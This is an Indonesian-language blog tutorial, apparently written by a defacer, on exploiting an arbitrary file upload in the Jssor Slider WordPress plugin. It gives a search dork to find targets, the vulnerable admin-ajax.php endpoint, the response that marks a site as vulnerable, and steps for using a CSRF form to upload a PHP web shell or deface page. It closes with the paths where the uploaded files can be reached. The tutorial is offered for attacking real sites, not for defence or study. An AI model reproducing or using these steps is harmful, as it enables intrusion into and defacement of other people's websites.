Jssor Arbitary File Upload<WordPress>
Hallo Semua sore sore gini enak nya bikin anak eh tutor ea.
1.Dork: Inurl:/wp-content/jssor-slider/ site:
2.Exploit:/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
3.Csrf: Touh Me Senpai :*
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
Pertama kalian Dorking Dulu> Pilih salah satu website dan masuka exploit.
Jika vuln terdapat tulisan= {"jsonrpc" : "2.0", "result" : null, "id" : "id"} | Lihat gambar.
Okay masukan website nya kedalam CSRF Ganti Site.com menjadi website yang vuln, Jika sudah simpan sript dengan format .HTML
Jika sudah, buka CSRF tersebut.
Klik upload.
Upload Shell kalian ber extensi .php atau upload script deface kalian.
Jika Sudah Ter upload, buka SHELL atau SCRIPT deface.
Akses
/wp-content/jssor-slider/jssor-uploads/nama script.html
/wp-content/jssor-slider/jssor-uploads/nama shell.php.
Sekian Tutorial Deface Jssor Arbitary Dari Saya jan9kr1k.
Support & Like Fp Kami
Komentar
Posting Komentar